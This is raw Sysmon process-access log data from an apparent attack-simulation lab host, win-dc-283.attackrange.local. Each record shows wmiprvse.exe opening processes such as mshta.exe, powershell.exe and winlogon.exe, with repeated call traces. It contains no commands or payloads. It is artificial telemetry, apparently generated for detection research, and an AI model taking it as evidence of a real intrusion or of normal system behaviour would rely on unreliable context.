16:01:40.284{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-53E3-6008-A806-00000000A301}5508C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029260Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.284{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-53E2-6008-A306-00000000A301}4128C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029259Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.284{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-53D1-6008-A006-00000000A301}4404C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029258Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.284{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029257Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.284{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029256Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.284{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029255Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.284{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029254Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.284{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029253Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.284{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029252Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.284{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029251Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.284{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029250Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.284{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029249Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.268{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029248Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.268{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029247Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.268{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029246Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.268{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029245Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.268{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029244Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.268{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029243Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.268{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029242Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:01:40.268{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000029241Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 